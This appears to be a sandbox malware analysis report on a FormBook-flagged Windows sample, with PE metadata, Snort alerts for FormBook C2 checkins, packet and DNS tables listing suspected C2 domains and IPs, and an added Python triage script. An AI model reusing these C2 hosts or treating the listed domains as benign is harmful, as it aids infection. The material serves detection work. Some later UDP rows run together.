                                                                                                                        .text   0x1000           0x58d2        0x5a00    False     0.665234375      data       6.43310034828  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata  0x7000           0x1190        0x1200    False     0.4453125        data       5.17976375781  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data   0x9000           0x1af78       0x400     False     0.55078125       data       4.6178023207   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .ndata  0x24000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc   0x2c000          0xc68         0xe00     False     0.407087053571   data       3.98321239368  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        Name           RVA      Size   Type                                                                          Language  Country
                                                                                                                        RT_ICON        0x2c1d8  0x2e8  data                                                                          English   United States
                                                                                                                        RT_DIALOG      0x2c4c0  0x100  data                                                                          English   United States
                                                                                                                        RT_DIALOG      0x2c5c0  0x11c  data                                                                          English   United States
                                                                                                                        RT_DIALOG      0x2c6e0  0x60   data                                                                          English   United States
                                                                                                                        RT_GROUP_ICON  0x2c740  0x14   data                                                                          English   United States
                                                                                                                        RT_VERSION     0x2c758  0x23c  data
                                                                                                                        RT_MANIFEST    0x2c998  0x2cc  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                                                                                                        Imports

                                                                                                                        DLL           Imports
                                                                                                                        KERNEL32.dll  CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                                                        USER32.dll    EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                        GDI32.dll     SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                        SHELL32.dll   SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                        ADVAPI32.dll  RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                        COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                        ole32.dll     CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                        VERSION.dll   GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Version Infos

Description        Data
LegalCopyright     rules
FileVersion        6.3.0.6
CompanyName        cloak
LegalTrademarks    erect
Comments           conspired
ProductName        unsubstantiated
FileDescription    team
Translation        0x0000 0x04e4

Possible Origin

Language of compilation system    Country where language is spoken
English                           United States

Network Behavior

Snort IDS Alerts

Timestamp                  Proto  SID      Message                               Src Port  Dst Port  Source IP        Dest IP
06/16/21-11:56:24.869313   TCP    1201     ATTACK-RESPONSES 403 Forbidden        80        49724     34.102.136.180   192.168.2.5
06/16/21-11:56:35.233381   TCP    1201     ATTACK-RESPONSES 403 Forbidden        80        49725     34.102.136.180   192.168.2.5
06/16/21-11:56:46.451286   TCP    1201     ATTACK-RESPONSES 403 Forbidden        80        49727     100.24.208.97    192.168.2.5
06/16/21-11:57:29.460119   TCP    1201     ATTACK-RESPONSES 403 Forbidden        80        49739     34.102.136.180   192.168.2.5
06/16/21-11:57:34.736114   TCP    2031453  ET TROJAN FormBook CnC Checkin (GET)  49740     80        192.168.2.5      104.252.53.222
06/16/21-11:57:34.736114   TCP    2031449  ET TROJAN FormBook CnC Checkin (GET)  49740     80        192.168.2.5      104.252.53.222
06/16/21-11:57:34.736114   TCP    2031412  ET TROJAN FormBook CnC Checkin (GET)  49740     80        192.168.2.5      104.252.53.222

Network Port Distribution

TCP Packets

Timestamp                              Src Port  Dst Port  Source IP        Dest IP
Jun 16, 2021 11:56:24.688205957 CEST   49724     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:24.730207920 CEST   80        49724     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:24.730315924 CEST   49724     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:24.730427027 CEST   49724     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:24.772450924 CEST   80        49724     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:24.869313002 CEST   80        49724     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:24.869354010 CEST   80        49724     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:24.869544983 CEST   49724     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:24.869610071 CEST   49724     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:24.912322044 CEST   80        49724     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:35.051707983 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.094455004 CEST   80        49725     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:35.094558954 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.094669104 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.137404919 CEST   80        49725     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:35.233381033 CEST   80        49725     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:35.233429909 CEST   80        49725     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:35.233649969 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.233704090 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.541867971 CEST   49725     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:56:35.585726023 CEST   80        49725     34.102.136.180   192.168.2.5
Jun 16, 2021 11:56:40.335808039 CEST   49726     80        192.168.2.5      154.216.127.214
Jun 16, 2021 11:56:40.636512041 CEST   80        49726     154.216.127.214  192.168.2.5
Jun 16, 2021 11:56:40.636651039 CEST   49726     80        192.168.2.5      154.216.127.214
Jun 16, 2021 11:56:40.636791945 CEST   49726     80        192.168.2.5      154.216.127.214
Jun 16, 2021 11:56:40.936868906 CEST   80        49726     154.216.127.214  192.168.2.5
Jun 16, 2021 11:56:40.945055962 CEST   80        49726     154.216.127.214  192.168.2.5
Jun 16, 2021 11:56:40.945220947 CEST   49726     80        192.168.2.5      154.216.127.214
Jun 16, 2021 11:56:40.945296049 CEST   49726     80        192.168.2.5      154.216.127.214
Jun 16, 2021 11:56:41.247371912 CEST   80        49726     154.216.127.214  192.168.2.5
Jun 16, 2021 11:56:46.121514082 CEST   49727     80        192.168.2.5      100.24.208.97
Jun 16, 2021 11:56:46.286592007 CEST   80        49727     100.24.208.97    192.168.2.5
Jun 16, 2021 11:56:46.287946939 CEST   49727     80        192.168.2.5      100.24.208.97
Jun 16, 2021 11:56:46.288027048 CEST   49727     80        192.168.2.5      100.24.208.97
Jun 16, 2021 11:56:46.451244116 CEST   80        49727     100.24.208.97    192.168.2.5
Jun 16, 2021 11:56:46.451286077 CEST   80        49727     100.24.208.97    192.168.2.5
Jun 16, 2021 11:56:46.451313972 CEST   80        49727     100.24.208.97    192.168.2.5
Jun 16, 2021 11:56:46.451463938 CEST   49727     80        192.168.2.5      100.24.208.97
Jun 16, 2021 11:56:46.451544046 CEST   49727     80        192.168.2.5      100.24.208.97
Jun 16, 2021 11:56:46.614643097 CEST   80        49727     100.24.208.97    192.168.2.5
Jun 16, 2021 11:56:51.653141975 CEST   49728     80        192.168.2.5      44.227.65.245
Jun 16, 2021 11:56:51.859803915 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:51.864295959 CEST   49728     80        192.168.2.5      44.227.65.245
Jun 16, 2021 11:56:52.070557117 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:52.072431087 CEST   49728     80        192.168.2.5      44.227.65.245
Jun 16, 2021 11:56:52.278664112 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:52.284991026 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:52.285027027 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:52.285314083 CEST   49728     80        192.168.2.5      44.227.65.245
Jun 16, 2021 11:56:52.285372972 CEST   49728     80        192.168.2.5      44.227.65.245
Jun 16, 2021 11:56:52.491643906 CEST   80        49728     44.227.65.245    192.168.2.5
Jun 16, 2021 11:56:57.679660082 CEST   49730     80        192.168.2.5      103.28.148.178
Jun 16, 2021 11:56:57.887600899 CEST   80        49730     103.28.148.178   192.168.2.5
Jun 16, 2021 11:56:57.887728930 CEST   49730     80        192.168.2.5      103.28.148.178
Jun 16, 2021 11:56:57.887948036 CEST   49730     80        192.168.2.5      103.28.148.178
Jun 16, 2021 11:56:58.096360922 CEST   80        49730     103.28.148.178   192.168.2.5
Jun 16, 2021 11:56:58.096405029 CEST   80        49730     103.28.148.178   192.168.2.5
Jun 16, 2021 11:56:58.096425056 CEST   80        49730     103.28.148.178   192.168.2.5
Jun 16, 2021 11:56:58.096636057 CEST   49730     80        192.168.2.5      103.28.148.178
Jun 16, 2021 11:56:58.096677065 CEST   49730     80        192.168.2.5      103.28.148.178
Jun 16, 2021 11:57:08.600071907 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.644131899 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.644248009 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.644377947 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.688664913 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744154930 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744203091 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744240999 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744281054 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744318008 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744355917 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744385004 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744393110 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744421959 CEST   80        49737     172.67.193.107   192.168.2.5
Jun 16, 2021 11:57:08.744436979 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744445086 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744450092 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744453907 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744458914 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:08.744478941 CEST   49737     80        192.168.2.5      172.67.193.107
Jun 16, 2021 11:57:18.859307051 CEST   49738     80        192.168.2.5      192.0.78.24
Jun 16, 2021 11:57:18.902406931 CEST   80        49738     192.0.78.24      192.168.2.5
Jun 16, 2021 11:57:18.902602911 CEST   49738     80        192.168.2.5      192.0.78.24
Jun 16, 2021 11:57:18.902817965 CEST   49738     80        192.168.2.5      192.0.78.24
Jun 16, 2021 11:57:18.944798946 CEST   80        49738     192.0.78.24      192.168.2.5
Jun 16, 2021 11:57:18.944828033 CEST   80        49738     192.0.78.24      192.168.2.5
Jun 16, 2021 11:57:18.944839954 CEST   80        49738     192.0.78.24      192.168.2.5
Jun 16, 2021 11:57:18.945058107 CEST   49738     80        192.168.2.5      192.0.78.24
Jun 16, 2021 11:57:18.945122957 CEST   49738     80        192.168.2.5      192.0.78.24
Jun 16, 2021 11:57:18.987149000 CEST   80        49738     192.0.78.24      192.168.2.5
Jun 16, 2021 11:57:29.277925014 CEST   49739     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:57:29.320127964 CEST   80        49739     34.102.136.180   192.168.2.5
Jun 16, 2021 11:57:29.320230961 CEST   49739     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:57:29.320394993 CEST   49739     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:57:29.362550020 CEST   80        49739     34.102.136.180   192.168.2.5
Jun 16, 2021 11:57:29.460119009 CEST   80        49739     34.102.136.180   192.168.2.5
Jun 16, 2021 11:57:29.460160017 CEST   80        49739     34.102.136.180   192.168.2.5
Jun 16, 2021 11:57:29.460418940 CEST   49739     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:57:29.460449934 CEST   49739     80        192.168.2.5      34.102.136.180
Jun 16, 2021 11:57:29.503093004 CEST   80        49739     34.102.136.180   192.168.2.5
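
Read together, the Snort alerts and the TCP packet rows above split the hosts this sample contacted into three groups: the single host hit by the ET TROJAN FormBook CnC Checkin rules (104.252.53.222), hosts whose only alert is the generic 403 Forbidden response rule (SID 1201, three connections to 34.102.136.180 and one to 100.24.208.97), and hosts that produced no alert at all. The Python script below is an added worked example and is not part of the Joe Sandbox report; it parses a pipe-separated copy of the rows above (the pipe layout, the reduced packet sample and the label names are constructed for the example) and produces that per-host grouping. The checkin connection on client port 49740 has no packet rows in this excerpt, so the script also has to cope with a host that appears in the alert table only.

```python
# Added example: correlate Snort alerts with a sandbox report's packet table.
# The sample rows are copied from the report's tables; the pipe layout is constructed.
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterator, Optional, Set, Tuple

SANDBOX_IP = "192.168.2.5"  # address of the analysis VM throughout the report
SID_HTTP_403 = 1201         # Snort rule "ATTACK-RESPONSES 403 Forbidden"
FORMBOOK_PREFIX = "ET TROJAN FormBook"

# timestamp|proto|sid|message|src port|dst port|src ip|dst ip
SNORT_ALERTS = """\
06/16/21-11:56:24.869313|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49724|34.102.136.180|192.168.2.5
06/16/21-11:56:35.233381|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49725|34.102.136.180|192.168.2.5
06/16/21-11:56:46.451286|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49727|100.24.208.97|192.168.2.5
06/16/21-11:57:29.460119|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49739|34.102.136.180|192.168.2.5
06/16/21-11:57:34.736114|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49740|80|192.168.2.5|104.252.53.222
06/16/21-11:57:34.736114|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49740|80|192.168.2.5|104.252.53.222
06/16/21-11:57:34.736114|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49740|80|192.168.2.5|104.252.53.222
"""

# timestamp|src port|dst port|src ip|dst ip: the first packet of every
# connection in the report plus one server reply (the full table has more rows)
TCP_PACKETS = """\
11:56:24.688205957|49724|80|192.168.2.5|34.102.136.180
11:56:35.051707983|49725|80|192.168.2.5|34.102.136.180
11:56:40.335808039|49726|80|192.168.2.5|154.216.127.214
11:56:46.121514082|49727|80|192.168.2.5|100.24.208.97
11:56:51.653141975|49728|80|192.168.2.5|44.227.65.245
11:56:57.679660082|49730|80|192.168.2.5|103.28.148.178
11:57:08.600071907|49737|80|192.168.2.5|172.67.193.107
11:57:18.859307051|49738|80|192.168.2.5|192.0.78.24
11:57:29.277925014|49739|80|192.168.2.5|34.102.136.180
11:57:29.503093004|80|49739|34.102.136.180|192.168.2.5
"""


@dataclass
class HostSummary:
    client_ports: Set[int] = field(default_factory=set)  # one per TCP connection
    first_seen: Optional[str] = None
    last_seen: Optional[str] = None
    alerts: Dict[int, str] = field(default_factory=dict)  # SID -> rule message


def remote_side(sport: int, dport: int, sip: str, dip: str) -> Tuple[str, int]:
    """Return (remote host, sandbox-side port) regardless of packet direction."""
    if sip == SANDBOX_IP:
        return dip, sport
    if dip == SANDBOX_IP:
        return sip, dport
    raise ValueError(f"neither endpoint is the sandbox VM: {sip} -> {dip}")


def parse_packets(text: str) -> Iterator[Tuple[str, int, int, str, str]]:
    for line in filter(None, text.splitlines()):
        ts, sport, dport, sip, dip = line.split("|")
        yield ts, int(sport), int(dport), sip, dip


def parse_alerts(text: str) -> Iterator[Tuple[int, str, str]]:
    """Yield (sid, message, remote host) for each alert line."""
    for line in filter(None, text.splitlines()):
        _ts, _proto, sid, msg, sport, dport, sip, dip = line.split("|")
        remote, _ = remote_side(int(sport), int(dport), sip, dip)
        yield int(sid), msg, remote


def summarize(packets, alerts) -> Dict[str, HostSummary]:
    """Fold packets and alerts into one record per remote host."""
    hosts: Dict[str, HostSummary] = defaultdict(HostSummary)
    for ts, sport, dport, sip, dip in packets:
        remote, cport = remote_side(sport, dport, sip, dip)
        h = hosts[remote]
        h.client_ports.add(cport)
        h.first_seen = ts if h.first_seen is None else min(h.first_seen, ts)
        h.last_seen = ts if h.last_seen is None else max(h.last_seen, ts)
    for sid, msg, remote in alerts:
        hosts[remote].alerts[sid] = msg  # also creates entries for alert-only hosts
    return dict(hosts)


def classify(hosts: Dict[str, HostSummary]) -> Dict[str, str]:
    """Label each host by the strongest alert seen against it."""
    labels = {}
    for host, h in hosts.items():
        if any(m.startswith(FORMBOOK_PREFIX) for m in h.alerts.values()):
            labels[host] = "formbook-c2-checkin"
        elif set(h.alerts) == {SID_HTTP_403}:
            labels[host] = "http-403-only"
        else:
            labels[host] = "other-alert" if h.alerts else "no-alert"
    return labels


def report(hosts: Dict[str, HostSummary]):
    """One line per host, C2 hits first, for a triage note."""
    labels = classify(hosts)
    rank = {"formbook-c2-checkin": 0, "other-alert": 1, "http-403-only": 2, "no-alert": 3}
    lines = []
    for host in sorted(hosts, key=lambda x: (rank[labels[x]], x)):
        h = hosts[host]
        sids = ",".join(str(s) for s in sorted(h.alerts)) or "-"
        lines.append(f"{host:16} {labels[host]:20} conns={len(h.client_ports)} sids={sids}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(summarize(parse_packets(TCP_PACKETS), parse_alerts(SNORT_ALERTS)))))
```

Run stand-alone it prints one line per remote host with the checkin host first, its three ET SIDs and zero connections from the packet excerpt; the classification keys only on the ET FormBook message prefix and on SID 1201, so it needs extending for other rule sets.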

UDP Packets

Timestamp                              Src Port  Dst Port  Source IP        Dest IP
Jun 16, 2021 11:55:07.948940992 CEST   61733     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:08.017323017 CEST   53        61733     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:08.687066078 CEST   65447     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:08.738143921 CEST   53        65447     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:09.180037975 CEST   52441     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:09.239356995 CEST   53        52441     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:09.533924103 CEST   62176     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:09.583992958 CEST   53        62176     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:10.445507050 CEST   59596     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:10.501691103 CEST   53        59596     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:24.238585949 CEST   65296     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:24.298947096 CEST   53        65296     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:25.048288107 CEST   63183     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:25.107140064 CEST   53        63183     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:30.633595943 CEST   60151     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:30.684129000 CEST   53        60151     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:32.106020927 CEST   56969     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:32.174222946 CEST   53        56969     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:33.649411917 CEST   55161     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:33.700258970 CEST   53        55161     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:35.138420105 CEST   54757     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:35.201173067 CEST   53        54757     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:36.096399069 CEST   49992     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:36.155591011 CEST   53        49992     8.8.8.8          192.168.2.5
Jun 16, 2021 11:55:47.553071976 CEST   60075     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:55:47.617930889 CEST   53        60075     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:04.004170895 CEST   55016     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:04.063015938 CEST   53        55016     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:04.214936972 CEST   64345     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:04.273946047 CEST   53        64345     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:09.068285942 CEST   57128     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:09.150701046 CEST   53        57128     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:24.612291098 CEST   54791     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:24.680284023 CEST   53        54791     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:29.889878035 CEST   50463     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:29.964941978 CEST   53        50463     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:34.983804941 CEST   50394     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:35.048515081 CEST   53        50394     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:40.268513918 CEST   58530     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:40.334650040 CEST   53        58530     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:45.964019060 CEST   53813     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:46.120248079 CEST   53        53813     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:51.474980116 CEST   63732     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:51.648000956 CEST   53        63732     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:52.429426908 CEST   57344     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:52.493499041 CEST   53        57344     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:57.314948082 CEST   54450     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:57.677643061 CEST   53        54450     8.8.8.8          192.168.2.5
Jun 16, 2021 11:56:58.209364891 CEST   59261     53        192.168.2.5      8.8.8.8
Jun 16, 2021 11:56:58.274971008 CEST   53        59261     8.8.8.8          192.168.2.5
Jun 16, 2021 11:57:03.110196114 CEST   57151     53        192.168.2.5      8.8.8.8
                                                                                                                        Jun 16, 2021 11:57:03.516789913 CEST53571518.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:04.615060091 CEST5941353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:04.676740885 CEST53594138.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.532646894 CEST6051653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:08.598931074 CEST53605168.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.786890030 CEST5164953192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:18.857973099 CEST53516498.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:23.957458019 CEST6508653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:24.191294909 CEST53650868.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.211631060 CEST5643253192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:29.276146889 CEST53564328.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:34.469780922 CEST5292953192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:34.539542913 CEST53529298.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:40.251743078 CEST6431753192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:40.319406033 CEST53643178.8.8.8192.168.2.5

DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jun 16, 2021 11:56:24.612291098 CEST | 192.168.2.5 | 8.8.8.8 | 0xbcd | Standard query (0) | www.jiltedowl.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:29.889878035 CEST | 192.168.2.5 | 8.8.8.8 | 0x2a65 | Standard query (0) | www.top1opp.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:34.983804941 CEST | 192.168.2.5 | 8.8.8.8 | 0xcf90 | Standard query (0) | www.slingshotart.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:40.268513918 CEST | 192.168.2.5 | 8.8.8.8 | 0x2a42 | Standard query (0) | www.venturivasiljevic.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:45.964019060 CEST | 192.168.2.5 | 8.8.8.8 | 0xaba1 | Standard query (0) | www.helpushelpothersstore.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:51.474980116 CEST | 192.168.2.5 | 8.8.8.8 | 0x11e1 | Standard query (0) | www.vicdux.life | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:57.314948082 CEST | 192.168.2.5 | 8.8.8.8 | 0xc140 | Standard query (0) | www.lippocaritahotel.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:03.110196114 CEST | 192.168.2.5 | 8.8.8.8 | 0xb8c | Standard query (0) | www.saddletaxweigh.info | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:08.532646894 CEST | 192.168.2.5 | 8.8.8.8 | 0xbad9 | Standard query (0) | www.sitedesing.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:18.786890030 CEST | 192.168.2.5 | 8.8.8.8 | 0xaae6 | Standard query (0) | www.themiamadison.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:23.957458019 CEST | 192.168.2.5 | 8.8.8.8 | 0xb48c | Standard query (0) | www.yorkshirebridalmakeup.info | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:29.211631060 CEST | 192.168.2.5 | 8.8.8.8 | 0x7eba | Standard query (0) | www.influenced-brands.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:34.469780922 CEST | 192.168.2.5 | 8.8.8.8 | 0x78af | Standard query (0) | www.angrybird23blog.com | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:57:40.251743078 CEST | 192.168.2.5 | 8.8.8.8 | 0x6b2b | Standard query (0) | www.therios.net | A (IP address) | IN (0x0001) |

DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jun 16, 2021 11:56:24.680284023 CEST | 8.8.8.8 | 192.168.2.5 | 0xbcd | No error (0) | www.jiltedowl.com | jiltedowl.com | | CNAME (Canonical name) | IN (0x0001) |
| Jun 16, 2021 11:56:24.680284023 CEST | 8.8.8.8 | 192.168.2.5 | 0xbcd | No error (0) | jiltedowl.com | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Jun 16, 2021 11:56:29.964941978 CEST | 8.8.8.8 | 192.168.2.5 | 0x2a65 | Server failure (2) | www.top1opp.com | none | none | A (IP address) | IN (0x0001) |
